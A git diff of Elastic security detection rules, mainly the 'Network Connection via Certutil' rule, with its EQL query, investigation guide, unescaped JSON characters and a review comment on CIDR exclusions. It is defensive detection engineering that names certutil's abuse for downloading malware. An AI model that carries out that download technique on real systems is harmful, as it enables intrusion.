This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"certutil.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"certutil.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_107.json b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_107.json index 5ec8c32fceb..2812ffc3603 100644 --- a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_107.json +++ b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_107.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Certutil", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"certutil.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"certutil.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_108.json b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_108.json index 8b5c5a32d4d..56e634d8c5e 100644 --- a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_108.json +++ b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_108.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Certutil", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "network where host.os.type == \"windows\" and process.name : \"certutil.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_109.json b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_109.json new file mode 100644 index 00000000000..e0fc51e59c6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_109.json 
@@ -0,0 +1,84 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies certutil.exe making a network connection. Adversaries could abuse certutil.exe to download a certificate, or malware, from a remote URL.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Connection via Certutil", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/master/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine 
the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "network where host.os.type == \"windows\" and process.name : \"certutil.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")\n", + "references": [ + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml", + "https://frsecure.com/malware-incident-response-playbook/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "3838e0e3-1850-4850-a411-2e8c5ba40ba8", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": 
"https://attack.mitre.org/tactics/TA0011/"
+ },
+ "technique": [
+ {
+ "id": "T1105",
+ "name": "Ingress Tool Transfer",
+ "reference": "https://attack.mitre.org/techniques/T1105/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 109
+ },
+ "id": "3838e0e3-1850-4850-a411-2e8c5ba40ba8_109",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_102.json b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_102.json
index a91834d3a34..bcdc63f95e9 100644
--- a/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_102.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 73,
 "rule_id": "38948d29-3d5d-42e3-8aec-be832aaaf8eb",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
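Review bot: The `cidrmatch` exclusion list in the new `query` does not match the IANA registry the `note` says it follows: `0.0.0.0/8` ("this network") is missing on the IPv4 side, and on the IPv6 side loopback, link-local and multicast are excluded while unique-local `fc00::/7` is not, so certutil traffic to internal IPv6 hosts is treated as external and will produce low-value alerts. Adding the two ranges, e.g. `"240.0.0.0/4", "0.0.0.0/8", "::1", "FC00::/7",`, aligns the query with its stated reference; the same list appears in the _108 hunk above and, as far as visible, in the sequence-form query at the start of this chunk. As a point of style, `192.0.0.0/29`, `192.0.0.8/32`, `192.0.0.9/32`, `192.0.0.10/32`, `192.0.0.170/32` and `192.0.0.171/32` are already covered by `192.0.0.0/24` and can be dropped. Since the list carries IPv6 entries, `references` could also cite the IANA IPv6 Special-Purpose Address Registry alongside the IPv4 one.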
diff --git a/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_103.json b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_103.json
index 2845bd85c3f..1d44a889f08 100644
--- a/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_103.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 73,
 "rule_id": "38948d29-3d5d-42e3-8aec-be832aaaf8eb",
